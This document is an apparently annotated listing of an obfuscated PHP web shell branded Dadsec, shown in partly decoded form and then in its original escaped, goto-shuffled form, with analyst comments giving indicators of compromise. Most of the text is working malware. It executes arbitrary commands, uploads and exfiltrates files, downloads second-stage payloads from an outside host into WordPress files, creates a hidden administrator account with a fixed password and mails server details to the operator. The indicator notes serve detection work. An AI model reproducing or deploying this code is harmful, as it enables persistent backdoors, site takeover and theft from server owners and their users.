                    "aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==" 
                ) . 
                GetIP() . 
                "-" . 
                base64_encode( 
                    "http://" . 
                        $_SERVER["HTTP_HOST"] . 
                        $_SERVER["REQUEST_URI"] 
                ); 
            goto SeJ_g; 
            n4EYX: 
            // Web root; base path for wp-load.php, wp-clon.php, phpinfo.php
            // and the directory enumeration.
            $document_root = 
                $_SERVER[ 
                    "DOCUMENT_ROOT" 
                ]; 
            goto eTg8m; 
            ed42a: 
            // Address of the requester, reported in the first notification mail.
            $ip_remote = 
                $_SERVER["REMOTE_ADDR"]; 
            goto uKFRu; 
            yOXvE: 
            /**
             * Handler for `?feature=upload`: write a client-supplied file to disk.
             *
             * Analyst note: $path and $cwd come straight from $_POST and are not
             * restricted, so files can be created or overwritten anywhere the web
             * server account may write. File-integrity monitoring of the web root
             * is the control that catches this.
             *
             * @param string $path Destination path, relative to $cwd or absolute.
             * @param string $file Base64-encoded file content.
             * @param string $cwd  Directory to chdir() into first.
             * @return array ["stdout" => [status message], "cwd" => getcwd()]
             */
            function featureUpload($path, $file, $cwd) 
            { 
                chdir($cwd); 
                // "wb" truncates an existing file; errors are silenced with @.
                $f = @fopen($path, "wb"); 
                if ($f === false) { 
                    return [ 
                        "stdout" => [ 
                            "Invalid path / no write permission.", 
                        ], 
                        "cwd" => getcwd(), 
                    ]; 
                } else { 
                    fwrite($f, base64_decode($file)); 
                    fclose($f); 
                    return [ 
                        "stdout" => ["Done."], 
                        "cwd" => getcwd(), 
                    ]; 
                } 
            } 
            goto rzCDn; 
            l1I1k: 
            // data.txt handling, executed after the HTML page has been sent:
            // a POST field `query` is unslashed twice and written to data.txt in
            // the current directory; without it, up to six lines of data.txt are
            // echoed into the response as they are.
            // Analyst note: a data.txt file next to the shell is a further
            // on-disk indicator.
            if ($_POST["query"]) { 
                $veriyfy = stripslashes( 
                    stripslashes($_POST["query"]) 
                ); 
                $data = "data.txt"; 
                @touch("data.txt"); 
                $ver = @fopen($data, "w"); 
                @fwrite($ver, $veriyfy); 
                @fclose($ver); 
            } else { 
                $datas = @fopen("data.txt", "r"); 
                $i = 0; 
                while ($i <= 5) { 
                    $i++; 
                    $blue = @fgets($datas, 1024); 
                    echo $blue; 
                } 
            } 
            goto nk66E; 
            // End of the goto chain; nothing runs after this label.
            ujkIR: 
 
?>


Original Code

<?php

// ANALYST NOTE: this is the sample as stored on disk. Every string literal is
// written as a mix of octal (\143) and hex (\x6d) escapes and the statements are
// shuffled behind goto labels. A plain-text search for the decoded host names
// or file names will not match this form; search for the escape-heavy literals
// and the goto/label layout, or decode before matching.
goto ebyz5;
XWVJ1:
/**
 * Recursively collect every sub-directory below $base_dir.
 *
 * @param string $base_dir Directory to walk.
 * @return array Flat list of directory paths, each parent before its children.
 */
function expandDirectories($base_dir)
{
    $directories = [];
    foreach (scandir($base_dir) as $file) {
        // The escaped literals are "." and "..".
        if ($file == "\56" || $file == "\x2e\56") {
            continue;
        }
        $dir = $base_dir . DIRECTORY_SEPARATOR . $file;
        if (is_dir($dir)) {
            $directories[] = $dir;
            $directories = array_merge($directories, expandDirectories($dir));
        }
    }
    return $directories;
}
goto UVm_F;
MnOUx:
// Enumerate every directory under the web root for the later file-writing loop.
$directories = expandDirectories($document_root);
goto JpeK8;
cIV77:
/**
 * Tab-completion handler: runs bash's `compgen` builtin and returns its output.
 *
 * Analyst note: $fileName is interpolated into the command string without
 * escaping, which makes this a command-execution path of its own.
 *
 * @param string $fileName Prefix to complete.
 * @param string $cwd      Directory to chdir() into before running the command.
 * @param string $type     "cmd" selects `compgen -c`; any other value selects `compgen -f`.
 * @return array ["files" => lines of the command output]
 */
function featureHint($fileName, $cwd, $type)
{
    chdir($cwd);
    // "\143\x6d\144" is "cmd".
    if ($type == "\143\x6d\144") {
        // "compgen -c " followed by the prefix.
        $cmd = "\143\157\x6d\x70\147\x65\x6e\40\x2d\x63\40{$fileName}";
    } else {
        // "compgen -f " followed by the prefix.
        $cmd = "\x63\x6f\x6d\160\147\x65\x6e\40\x2d\146\x20{$fileName}";
    }
    // Wraps the command as /bin/bash -c "<cmd>"; the \x22 escapes are the
    // double quotes around it.
    $cmd = "\57\x62\x69\156\x2f\x62\141\x73\150\40\55\x63\40\x22{$cmd}\x22";
    $files = explode("\xa", shell_exec($cmd));
    // Array key is "files".
    return ["\146\x69\x6c\145\163" => $files];
}
goto pLvXH;
CIMtL:
// Appends "Shell Link : http://" + SERVER_NAME + PHP_SELF to the mail body.
$EL_MuHaMMeD .=
    "\123\150\145\154\154\x20\x4c\x69\x6e\x6b\x20\x3a\x20\x68\164\164\x70\72\57\x2f" .
    $_SERVER["\123\105\x52\x56\105\122\x5f\116\101\x4d\105"] .
    $_SERVER["\x50\110\x50\x5f\x53\x45\114\106"] .
    "\xd\xa";
goto xz_53;
D2I2D:
// First notification mail; errors are silenced by @.
@mail($to_email, $server_mail, $linkcr, $header);
goto Ov2Mi;
C25SI:
// --- WordPress tampering: runs only when wp-load.php was found and included ---
if ($wp_detect == 1) {
    $wp_theme_dir = get_template_directory();
    // Target file: "/headers.php" inside the active theme directory.
    $header_file =
        $wp_theme_dir . "\57\150\145\x61\144\145\162\x73\x2e\x70\150\x70";
    $header_content = file_get_contents($header_file);
    // URL: https://acbdf.space/txt/seoco.txt
    $append = http_get(
        "\150\164\x74\160\163\72\x2f\x2f\141\x63\142\144\x66\56\163\x70\141\143\x65\57\164\x78\x74\x2f\163\x65\x6f\143\157\56\x74\170\164"
    );
    // The fetched text is used as a "#"-delimited pattern; it is prepended to
    // the file when it does not match the current content.
    if (!preg_match("\x23" . $append . "\x23", $header_content)) {
        $new_content = $append . $header_content;
        $open_file = fopen($header_file, "\x77");
        fwrite($open_file, $new_content);
        fclose($open_file);
    }
    // User name "webmaster".
    $user = "\167\x65\142\x6d\x61\x73\x74\145\x72";
    // Both dollar signs are escaped (\44), so nothing is interpolated here.
    $pass = "\44\x50\44\x42\x78\112\117\x4e\62\x42\63\x72\162";
    // Escaped e-mail literal for the new account; the decoded rendering on
    // this page shows it masked as "[email protected]".
    $email =
        "\x6c\157\x67\x69\156\x6f\x6c\144\165\155\x40\147\155\x61\x69\154\56\143\157\x6d";
    // Creates the account and assigns the role "administrator" unless the
    // user name or e-mail already exists; audit the user table for it.
    if (!username_exists($user) && !email_exists($email)) {
        $user_id = wp_create_user($user, $pass, $email);
        $user = new WP_User($user_id);
        $user->set_role("\x61\144\155\151\x6e\x69\163\164\162\141\164\x6f\162");
    }
    // Target file: ABSPATH + "/wp-login.php", overwritten with the content of
    // https://acbdf.space/txt/seo.txt. Restore it from a known-good release.
    $wp_login =
        ABSPATH . "\x2f\x77\160\x2d\x6c\157\147\151\156\x2e\x70\x68\x70";
    $login = http_get(
        "\x68\164\x74\x70\x73\x3a\x2f\x2f\141\143\x62\x64\146\56\163\160\x61\143\x65\57\164\x78\164\x2f\x73\x65\x6f\56\164\170\164"
    );
    $open_login = fopen($wp_login, "\167");
    fwrite($open_login, $login);
    fclose($open_login);
}
goto qL7ih;
ifHFG:
// Mail body: "Link: " + SERVER_NAME + REQUEST_URI + requesting IP + timestamp.
$linkcr =
    "\x4c\x69\x6e\x6b\x3a\40" .
    $_SERVER["\123\105\x52\x56\105\x52\x5f\x4e\101\x4d\105"] .
    "" .
    $_SERVER["\122\105\x51\125\x45\x53\x54\x5f\125\122\x49"] .
    "\x20\55\x20\x49\120\x20\105\x78\x63\x75\164\151\x6e\147\x3a\x20{$ip_remote}\40\55\x20\x54\x69\x6d\x65\x3a\x20{$time_shell}";
goto X5nrA;
ng0zC:
// Mail subject "whm 20203".
$baslik = "\167\x68\155\x20\x32\60\62\60\63";
goto ob2L9;
ebyz5:
/**
 * Return the requester's IP address as reported by the environment.
 *
 * Analyst note: the escaped names are HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR
 * and REMOTE_ADDR, checked in that order, so request headers take precedence
 * over the socket address and the value is client-controlled.
 *
 * @return string|false First non-empty value of the three variables.
 */
function GetIP()
{
    if (getenv("\110\124\124\120\137\103\114\111\x45\116\124\137\x49\x50")) {
        $ip = getenv(
            "\x48\124\x54\x50\137\103\x4c\111\105\116\x54\137\x49\120"
        );
    } elseif (
        getenv(
            "\110\x54\124\x50\x5f\130\x5f\x46\x4f\122\127\101\122\104\x45\104\137\106\117\x52"
        )
    ) {
        $ip = getenv(
            "\x48\x54\x54\120\137\130\137\x46\117\122\127\x41\122\x44\105\104\x5f\x46\117\x52"
        );
        // "\54" is a comma: keep only the first entry of a proxy chain.
        if (strstr($ip, "\54")) {
            $tmp = explode("\54", $ip);
            $ip = trim($tmp[0]);
        }
    } else {
        $ip = getenv("\x52\105\x4d\117\124\105\x5f\101\104\104\x52");
    }
    return $ip;
}
goto mktxn;
nk66E:
// Probes for "js/js.php" (opened in mode "r"); errors are silenced.
$datasi = @fopen("\152\163\57\x6a\x73\x2e\160\150\160", "\x72");
goto TMx8f;
qmzzS:
fwrite($open_code, $code);
goto owiHs;
ch_4L:
// Mail subject: resolved SERVER_NAME, "  - ", HTTP_HOST.
$server_mail =
    "" .
    gethostbyname($_SERVER["\123\105\x52\x56\105\122\x5f\x4e\x41\115\x45"]) .
    "\40\40\x2d\x20" .
    $_SERVER["\x48\124\124\x50\137\110\117\x53\124"] .
    "";
goto ifHFG;
uKFRu:
// Sender address "whm@" + resolved SERVER_NAME.
$from_shellcode =
    "\x77\x68\155\100" .
    gethostbyname($_SERVER["\x53\x45\x52\126\x45\122\137\116\101\115\105"]) .
    "";
goto T6emA;
Ibor6:
// Mode "w": truncates the target before writing.
$open_makale = fopen($wp_makale, "\x77");
goto YinPl;
UnUy1:
// Indicator: "/wp-clon.php" directly in the document root.
$wp_code = $document_root . "\57\x77\160\55\x63\154\157\x6e\56\160\x68\x70";
goto fNnlt;
owiHs:
fclose($open_code);
goto rict2;
KE35w:
/**
 * Report the PHP process's current working directory.
 *
 * @return array Single entry keyed "cwd" (escaped below) holding getcwd().
 */
function featurePwd()
{
    return ["\x63\x77\144" => getcwd()];
}
goto cIV77;
x3CD0:
// Writes $css as "/wp-inda.php" into every enumerated directory whose path
// does not match the pattern "#wp-content#".
foreach ($directories as $dir) {
    if (!preg_match("\x23\167\160\55\143\x6f\156\164\145\156\164\x23", $dir)) {
        $css_file = $dir . "\x2f\167\x70\x2d\151\156\x64\x61\56\x70\x68\x70";
        $open_css = fopen($css_file, "\x77");
        fwrite($open_css, $css);
        fclose($open_css);
    }
}
goto XWVJ1;
cISOa:
/**
 * Interpret one line typed into the web terminal.
 *
 * Analyst note: the escaped patterns recognise a bare `cd`, `cd <path>` and
 * `download <path>`; every other line reaches exec() unchanged. The regular
 * expressions themselves are escaped too, so the words "cd" and "download"
 * do not appear in clear text in the stored file.
 *
 * @param string $cmd Command line as received.
 * @param string $cwd Working directory the client believes it is in.
 * @return array "stdout"/"cwd" entries, or the featureDownload() result.
 */
function featureShell($cmd, $cwd)
{
    $stdout = [];
    // Bare "cd": no action.
    if (preg_match("\x2f\136\x5c\x73\x2a\x63\x64\134\x73\52\44\57", $cmd)) {
    } elseif (
        // "cd <path>", optionally followed by "2>&1".
        preg_match(
            "\57\x5e\134\163\x2a\143\x64\134\x73\x2b\50\56\x2b\x29\x5c\163\52\50\x32\76\x26\61\x29\x3f\x24\x2f",
            $cmd
        )
    ) {
        chdir($cwd);
        preg_match(
            "\x2f\x5e\134\x73\x2a\143\x64\x5c\163\53\x28\133\136\x5c\163\135\x2b\51\x5c\x73\x2a\50\62\x3e\46\x31\x29\x3f\x24\57",
            $cmd,
            $match
        );
        chdir($match[1]);
    } elseif (
        // "download <path>", optionally followed by "2>&1".
        preg_match(
            "\57\136\134\163\52\x64\157\x77\x6e\154\157\x61\x64\134\163\x2b\133\x5e\134\x73\135\x2b\134\x73\52\x28\62\76\46\x31\x29\77\x24\57",
            $cmd
        )
    ) {
        chdir($cwd);
        preg_match(
            "\x2f\136\x5c\x73\x2a\x64\157\x77\156\x6c\157\141\x64\134\163\53\50\133\136\x5c\163\x5d\x2b\51\134\163\x2a\x28\62\x3e\x26\x31\51\x3f\44\57",
            $cmd,
            $match
        );
        return featureDownload($match[1]);
    } else {
        chdir($cwd);
        // Arbitrary command execution with the web server's privileges.
        exec($cmd, $stdout);
    }
    // Keys are "stdout" and "cwd".
    return ["\163\164\144\x6f\x75\164" => $stdout, "\x63\167\x64" => getcwd()];
}
// Jump on to the next handler declaration; UVm_F labels the http_get() helper.
goto KE35w;
UVm_F:
/**
 * Fetches a URL with cURL and returns the response body.
 *
 * Analyst note: every caller visible on this page passes a hard-coded URL on
 * the acbdf[.]space host and writes the returned body into a .php file, so
 * this is the second-stage downloader. Outbound HTTPS from the web server to
 * that host is a network-level indicator; egress filtering for the PHP worker
 * stops this step.
 *
 * @param string $url Address to request.
 * @return string|false Response body, or false when the transfer fails.
 */
function http_get($url)
{
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); // connect timeout only; no overall transfer timeout is set
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed
    curl_setopt($im, CURLOPT_HEADER, 0); // response headers are not included in the result
    return curl_exec($im);
    // Unreachable: the handle is never explicitly closed.
    curl_close($im);
}
goto l1I1k;
VvTms:
// The suffix decodes to "/phpinfo.php": a second dropped file in the document
// root, named to look like a leftover diagnostic page. Its content is $makale,
// fetched at label rict2. IoC: <DOCUMENT_ROOT>/phpinfo.php with unexpected content.
$wp_makale = $document_root . "\57\x70\x68\x70\x69\x6e\146\157\56\160\150\160";
goto Ibor6;
guOLF:
// Flag set to 1 at label qFzoY once a wp-load.php has been found and included.
$wp_detect = 0;
goto qFzoY;
oTiro:
?>
<!doctypehtml>
  <html>
    <head>
      <meta charset="UTF-8">
      <title>mangtxr@1337:~#</title>
      <meta content="width=device-width,initial-scale=1" name="viewport">
      <style>
        body,
        html {
          margin: 0;
          padding: 0;
          height: 100%;
          position: relative;
          background: #333;
          background-image: url(https://www.dadsec.pw/dadsecwal.png);
          background-position: center;
          background-repeat: no-repeat;
          background-size: cover;
          color: #eee;
          font-family: monospace
        }

        ::-webkit-scrollbar-track {
          border-radius: 8px;
          background-color: #353535
        }

        ::-webkit-scrollbar {
          width: 8px;
          height: 8px
        }

        ::-webkit-scrollbar-thumb {
          border-radius: 8px;
          -webkit-box-shadow: inset 0 0 6px rgba(0, 0, 0, .3);
          background-color: #bcbcbc
        }

        #shell {
          background: rgba(34, 34, 34, .9);
          max-width: 800px;
          margin: 50px auto 0 auto;
          box-shadow: 0 0 5px rgba(0, 0, 0, .3);
          font-size: 10pt;
          display: flex;
          flex-direction: column;
          align-items: stretch
        }

        #shell-content {
          height: 500px;
          overflow: auto;
          padding: 5px;
          white-space: pre-wrap;
          flex-grow: 1
        }

        #shell-logo {
          font-weight: 700;
          color: #75df0b;
          text-align: center
        }

        @media (max-width:991px) {
          #shell-logo {
            font-size: 6px;
            margin: -25px 0
          }

          #shell,
          body,
          html {
            height: 100%;
            width: 100%;
            max-width: none
          }

          #shell {
            margin-top: 0
          }
        }

        @media (max-width:767px) {
          #shell-input {
            flex-direction: column
          }
        }

        @media (max-width:320px) {
          #shell-logo {
            font-size: 5px
          }
        }

        .shell-prompt {
          font-weight: 700;
          color: #75df0b
        }

        .shell-prompt>span {
          color: #1bc9e7
        }

        #shell-input {
          display: flex;
          box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
          border-top: rgba(255, 255, 255, .05) solid 1px
        }

        #shell-input>label {
          flex-grow: 0;
          display: block;
          padding: 0 5px;
          height: 30px;
          line-height: 30px
        }

        #shell-input #shell-cmd {
          height: 30px;
          line-height: 30px;
          border: none;
          background: 0 0;
          color: #eee;
          font-family: monospace;
          font-size: 10pt;
          width: 100%;
          align-self: center
        }

        #shell-input div {
          flex-grow: 1;
          align-items: stretch
        }

        #shell-input input {
          outline: 0
        }
      </style>
      <script>
        var CWD = null,
          commandHistory = [],
          historyPosition = 0,
          eShellCmdInput = null,
          eShellContent = null;

        function _insertCommand(e) {
          eShellContent.innerHTML += "\n\n", eShellContent.innerHTML += '<span class="shell-prompt">' + genPrompt(CWD) + "</span> ", eShellContent.innerHTML += escapeHtml(e), eShellContent.innerHTML += "\n", eShellContent.scrollTop = eShellContent.scrollHeight
        }

        function _insertStdout(e) {
          eShellContent.innerHTML += escapeHtml(e), eShellContent.scrollTop = eShellContent.scrollHeight
        }

        function _defer(e) {
          setTimeout(e, 0)
        }

        // Client side of the "shell" feature. Echoes the typed line, then:
        //   "upload <path>"  -> featureUpload(<path>), handled via a file picker;
        //   "clear"          -> empties the output pane locally, no request sent;
        //   anything else    -> POST to "?feature=shell" with fields cmd and cwd.
        // A response carrying a "file" property is treated as a download; otherwise
        // its stdout lines are printed and the prompt is updated from e.cwd.
        // Detection hint: POST requests whose query string is "feature=shell" and
        // whose form body contains "cmd=" and "cwd=".
        function featureShell(e) {
          _insertCommand(e), /^\s*upload\s+[^\s]+\s*$/.test(e) ? featureUpload(e.match(/^\s*upload\s+([^\s]+)\s*$/)[1]) : /^\s*clear\s*$/.test(e) ? eShellContent.innerHTML = "" : makeRequest("?feature=shell", {
            cmd: e,
            cwd: CWD
          }, function(e) {
            e.hasOwnProperty("file") ? featureDownload(e.name, e.file) : (_insertStdout(e.stdout.join("\n")), updateCwd(e.cwd))
          })
        }

        function featureHint() {
          if (0 !== eShellCmdInput.value.trim().length) {
            var e = eShellCmdInput.value.split(" "),
              n = 1 === e.length ? "cmd" : "file";
            makeRequest("?feature=hint", {
              filename: "cmd" == n ? e[0] : e[e.length - 1],
              cwd: CWD,
              type: n
            }, function(e) {
              if (!(e.files.length <= 1))
                if (2 === e.files.length)
                  if ("cmd" == n) eShellCmdInput.value = e.files[0];
                  else {
                    var t = eShellCmdInput.value;
                    eShellCmdInput.value = t.replace(/([^\s]*)$/, e.files[0])
                  }
              else _insertCommand(eShellCmdInput.value), _insertStdout(e.files.join("\n"))
            })
          }
        }

        // Saves a file returned by the server: e is the file name, t its
        // base64-encoded content. A hidden <a download> pointing at a data: URI is
        // created, clicked and removed, so the browser makes no second request;
        // the file content only ever appears inside the JSON response body.
        function featureDownload(e, t) {
          var n = document.createElement("a");
          n.setAttribute("href", "data:application/octet-stream;base64," + t), n.setAttribute("download", e), n.style.display = "none", document.body.appendChild(n), n.click(), document.body.removeChild(n), _insertStdout("Done.")
        }

        // Client side of the "upload" feature: t is the destination path typed by
        // the operator. A hidden file input is opened; the chosen file is read as
        // base64 (getBase64) and POSTed to "?feature=upload" with fields path, file
        // and cwd. The upload is an ordinary urlencoded form body, not
        // multipart/form-data, so inspection rules keyed on multipart uploads do
        // not see it; look for a large base64 "file=" field instead.
        function featureUpload(t) {
          var e = document.createElement("input");
          e.setAttribute("type", "file"), e.style.display = "none", document.body.appendChild(e), e.addEventListener("change", function() {
            getBase64(e.files[0]).then(function(e) {
              makeRequest("?feature=upload", {
                path: t,
                file: e,
                cwd: CWD
              }, function(e) {
                _insertStdout(e.stdout.join("\n")), updateCwd(e.cwd)
              })
            }, function() {
              _insertStdout("An unknown client-side error occurred.")
            })
          }), e.click(), document.body.removeChild(e)
        }

        function getBase64(o, e) {
          return new Promise(function(e, t) {
            var n = new FileReader;
            n.onload = function() {
              e(n.result.match(/base64,(.*)$/)[1])
            }, n.onerror = t, n.readAsDataURL(o)
          })
        }

        // Builds the prompt markup for working directory e ("~" when empty). Paths
        // with more than two components are shortened to their last two; the full
        // path is placed in the span's title attribute without HTML escaping.
        // The literal "mangtx@1337:" (and "mangtxr@1337:~#" in the page <title>) are
        // static strings of this sample and usable in content signatures.
        function genPrompt(e) {
          var t = e = e || "~";
          if (3 < e.split("/").length) {
            var n = e.split("/");
            t = "/" + n[n.length - 2] + "/" + n[n.length - 1]
          }
          return 'mangtx@1337:<span title="' + e + '">' + t + "</span>#"
        }

        function updateCwd(e) {
          if (e) return CWD = e, void _updatePrompt();
          makeRequest("?feature=pwd", {}, function(e) {
            CWD = e.cwd, _updatePrompt()
          })
        }

        function escapeHtml(e) {
          return e.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
        }

        function _updatePrompt() {
          document.getElementById("shell-prompt").innerHTML = genPrompt(CWD)
        }

        function _onShellCmdKeyDown(e) {
          switch (e.key) {
            case "Enter":
              featureShell(eShellCmdInput.value), insertToHistory(eShellCmdInput.value), eShellCmdInput.value = "";
              break;
            case "ArrowUp":
              0 < historyPosition && (historyPosition--, eShellCmdInput.blur(), eShellCmdInput.value = commandHistory[historyPosition], _defer(function() {
                eShellCmdInput.focus()
              }));
              break;
            case "ArrowDown":
              if (historyPosition >= commandHistory.length) break;
              ++historyPosition === commandHistory.length ? eShellCmdInput.value = "" : (eShellCmdInput.blur(), eShellCmdInput.focus(), eShellCmdInput.value = commandHistory[historyPosition]);
              break;
            case "Tab":
              e.preventDefault(), featureHint()
          }
        }

        function insertToHistory(e) {
          commandHistory.push(e), historyPosition = commandHistory.length
        }

        // Transport helper for all features: POSTs the fields of n to the relative
        // URL e (the page's own address plus "?feature=...") as
        // application/x-www-form-urlencoded and passes the parsed JSON reply to t.
        // Only HTTP 200 replies are handled; a reply that is not valid JSON raises
        // an alert. No token, cookie or other credential is added here.
        function makeRequest(e, n, t) {
          var o = new XMLHttpRequest;
          o.open("POST", e, !0), o.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), o.onreadystatechange = function() {
            if (4 === o.readyState && 200 === o.status) try {
              var e = JSON.parse(o.responseText);
              t(e)
            } catch (e) {
              alert("Error while parsing response: " + e)
            }
          }, o.send(function() {
            var e = [];
            for (var t in n) n.hasOwnProperty(t) && e.push(encodeURIComponent(t) + "=" + encodeURIComponent(n[t]));
            return e.join("&")
          }())
        }
        document.onclick = function(e) {
          e = e || window.event;
          var t = window.getSelection();
          "SELECT" !== (e.target || e.srcElement).tagName && (t.toString() || eShellCmdInput.focus())
        }, window.onload = function() {
          eShellCmdInput = document.getElementById("shell-cmd"), eShellContent = document.getElementById("shell-content"), updateCwd(), eShellCmdInput.focus()
        }
      </script>
    </head>
    <body><br><br><br><br><br><br><br><br>
      <div id="shell">
        <pre id="shell-content">
                <div id="shell-logo"><span></span>
@@@@@@@@@@        @@@   @@@  @@@   @@@@@@@@  @@@@@@@  @@@  @@@  
@@@@@@@@@@@      @@@@   @@@@ @@@  @@@@@@@@@  @@@@@@@  @@@  @@@  
@@! @@! @@!     @@!@!   @@!@!@@@  !@@          @@!    @@!  !@@  
!@! !@! !@!    !@!!@!   !@!!@!@!  !@!          !@!    !@!  @!!  
@!! !!@ @!@   @!! @!!   @!@ !!@!  !@! @!@!@    @!!     !@@!@!   
!@!   ! !@!  !!!  !@!   !@!  !!!  !!! !!@!!    !!!      @!!!    
!!:     !!:  :!!:!:!!:  !!:  !!!  :!!   !!:    !!:     !: :!!   
:!:     :!:  !:::!!:::  :!:  !:!  :!:   !::    :!:    :!:  !:!  
:::     ::        :::    ::   ::   ::: ::::     ::     ::  :::  
 :      :         :::   ::    :    :: :: :      :      :   ::        

Dadsec Tools www.dadsec.pw
                </div>
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input id="shell-cmd"name="cmd"onkeydown="_onShellCmdKeyDown(event)"></div></div></div></body></html><?php
            goto n4EYX;
            pLvXH:
            /**
             * Reads a file from disk and returns it base64-encoded for the browser.
             *
             * Analyst note: $filePath is the path captured from a "download <path>"
             * command in featureShell(); it is not confined to any directory, so any
             * file readable by the PHP user (configuration files, credentials) can
             * be exfiltrated inside a JSON response.
             *
             * @param string $filePath Path to read, relative to the current directory.
             * @return array On failure: decoded keys "stdout" (one-line message
             *               "File not found / no read permission.") and "cwd".
             *               On success: decoded keys "name" (base name) and "file"
             *               (base64 content).
             */
            function featureDownload($filePath)
            {
                // "@" hides the warning; failure is detected through the false return.
                $file = @file_get_contents($filePath);
                if ($file === false) {
                    return [
                        "\163\x74\144\x6f\x75\x74" => [
                            "\106\151\x6c\x65\x20\156\157\164\x20\x66\157\x75\x6e\x64\40\x2f\40\156\157\40\x72\x65\x61\144\x20\x70\145\162\155\x69\x73\163\151\x6f\x6e\x2e",
                        ],
                        "\x63\x77\x64" => getcwd(),
                    ];
                } else {
                    return [
                        "\156\x61\155\145" => basename($filePath),
                        "\x66\151\x6c\x65" => base64_encode($file),
                    ];
                }
            }
            goto yOXvE;
            L6jgC:
            // Appends "Server Admin : <$_SERVER['SERVER_ADMIN']>\r\n" (decoded) to the
            // host-profile report that is mailed to the operator at label f56yq.
            $EL_MuHaMMeD .=
                "\123\145\x72\x76\x65\x72\40\101\144\x6d\151\x6e\x20\x3a\40" .
                $_SERVER["\123\x45\x52\126\x45\122\x5f\x41\x44\x4d\x49\116"] .
                "\xd\12";
            goto WXtQU;
            rict2:
            // Second-stage fetch. The URL decodes to
            // hxxps://acbdf[.]space/txt/phpinfo.txt; the body is written to
            // <DOCUMENT_ROOT>/phpinfo.php via labels VvTms, Ibor6 and YinPl.
            $makale = http_get(
                "\150\x74\164\160\163\x3a\x2f\x2f\x61\143\x62\144\x66\56\x73\160\141\x63\x65\57\164\170\164\57\x70\150\160\151\x6e\x66\157\x2e\164\170\164"
            );
            goto VvTms;
            X5nrA:
            // Mail headers: decodes to "From: <addr>\r\nReply-to: <addr>" with <addr>
            // being $from_shellcode ("whm@" + resolved server address, label uKFRu).
            $header = "\106\x72\157\x6d\72\40{$from_shellcode}\15\xa\x52\145\160\x6c\171\x2d\x74\157\72\x20{$from_shellcode}";
            goto D2I2D;
            qL7ih:
            // Second-stage fetch. The URL decodes to
            // hxxps://acbdf[.]space/txt/min.txt; the body is destined for
            // <DOCUMENT_ROOT>/wp-clon.php (label UnUy1).
            $code = http_get(
                "\150\164\164\x70\x73\72\57\x2f\x61\143\x62\x64\x66\x2e\163\160\x61\143\x65\x2f\164\170\164\x2f\x6d\x69\x6e\x2e\164\170\164"
            );
            goto UnUy1;
            fNnlt:
            // "\x77" is "w": creates or truncates wp-clon.php. The next label (qmzzS)
            // is not shown in this part of the listing.
            $open_code = fopen($wp_code, "\x77");
            goto qmzzS;
            rzCDn:
            // Analyst note: command dispatcher of the web shell. A request is treated
            // as an operator command when the query string carries "feature" (decoded
            // key); the value selects "shell", "pwd", "hint" or "upload". Arguments are
            // read from $_POST and passed on unmodified. No password, token or
            // source-address check appears in this block, so anyone who knows the
            // file's URL can use it. The reply is JSON and the script then stops, so
            // the statements reached after label oTiro (HTML page, then label n4EYX)
            // do not run for these requests.
            // Log signature: POST <file>?feature=(shell|pwd|hint|upload) answered
            // with Content-Type: application/json.
            if (isset($_GET["\146\x65\141\x74\x75\162\145"])) {
                $response = null;
                switch ($_GET["\x66\x65\141\164\x75\162\145"]) {
                    case "\x73\150\145\x6c\154":
                        // POST field "cmd"; unless it already contains "2>", the
                        // suffix " 2>&1" is appended so stderr is captured too.
                        $cmd = $_POST["\x63\x6d\x64"];
                        if (!preg_match("\x2f\x32\76\57", $cmd)) {
                            $cmd .= "\40\x32\x3e\46\x31";
                        }
                        $response = featureShell($cmd, $_POST["\x63\167\x64"]);
                        break;
                    case "\160\167\x64":
                        $response = featurePwd();
                        break;
                    case "\150\151\156\164":
                        // POST fields "filename", "cwd", "type" (tab completion).
                        $response = featureHint(
                            $_POST["\146\x69\x6c\145\x6e\x61\x6d\x65"],
                            $_POST["\143\x77\144"],
                            $_POST["\x74\x79\160\145"]
                        );
                        break;
                    case "\165\x70\x6c\157\141\x64":
                        // POST fields "path", "file" (base64), "cwd".
                        $response = featureUpload(
                            $_POST["\x70\141\x74\x68"],
                            $_POST["\146\x69\x6c\145"],
                            $_POST["\x63\167\144"]
                        );
                }
                // Decodes to "Content-Type: application/json". An unknown feature
                // value falls through the switch and yields the body "null".
                header(
                    "\x43\x6f\x6e\x74\x65\156\x74\55\x54\x79\x70\x65\72\x20\141\x70\x70\x6c\x69\x63\141\x74\151\x6f\x6e\x2f\x6a\163\157\156"
                );
                echo json_encode($response);
                die();
            }
            goto oTiro;
            ob2L9:
            // Starts the host-profile report. Decodes to
            // "Dosya Yolu : <$_SERVER['DOCUMENT_ROOT']>\r\n" (Turkish, "file path").
            $EL_MuHaMMeD =
                "\x44\157\163\171\141\x20\131\157\x6c\x75\x20\x3a\x20" .
                $_SERVER[
                    "\x44\117\x43\125\x4d\x45\x4e\x54\137\x52\x4f\117\124"
                ] .
                "\xd\xa";
            goto L6jgC;
            f56yq:
            // Sends the finished report. $kime is the recipient set at label Ov2Mi;
            // $baslik (presumably the subject) is assigned outside this part of the
            // listing. Outbound mail from the web server's PHP mail() path to that
            // recipient is an indicator to search for in MTA logs.
            mail($kime, $baslik, $EL_MuHaMMeD);
            goto ujkIR;
            RzdXK:
            // Timestamp in the decoded format "d/m/Y - H:i:s".
            $time_shell =
                "" .
                date("\x64\x2f\155\x2f\x59\x20\55\x20\x48\x3a\151\x3a\163") .
                "";
            goto ed42a;
            eTg8m:
            // Directory containing this script; used at label qFzoY as the starting
            // point of the upward search for wp-load.php.
            $document_root_file = dirname(__FILE__);
            goto guOLF;
            T6emA:
            // Recipient of the notification mail sent at label D2I2D. Decodes to
            // loginoldum[at]gmail[.]com (IoC). The next label (ch_4L) is not shown
            // in this part of the listing.
            $to_email =
                "\x6c\157\x67\x69\156\x6f\x6c\144\x75\x6d\100\x67\x6d\x61\x69\154\56\143\157\155";
            goto ch_4L;
            qFzoY:
            // Analyst note: WordPress detection. Every escaped literal here decodes to
            // "/wp-load.php", "wp-load.php", "/" or "../". If wp-load.php exists in the
            // document root it is included, which boots WordPress inside this script so
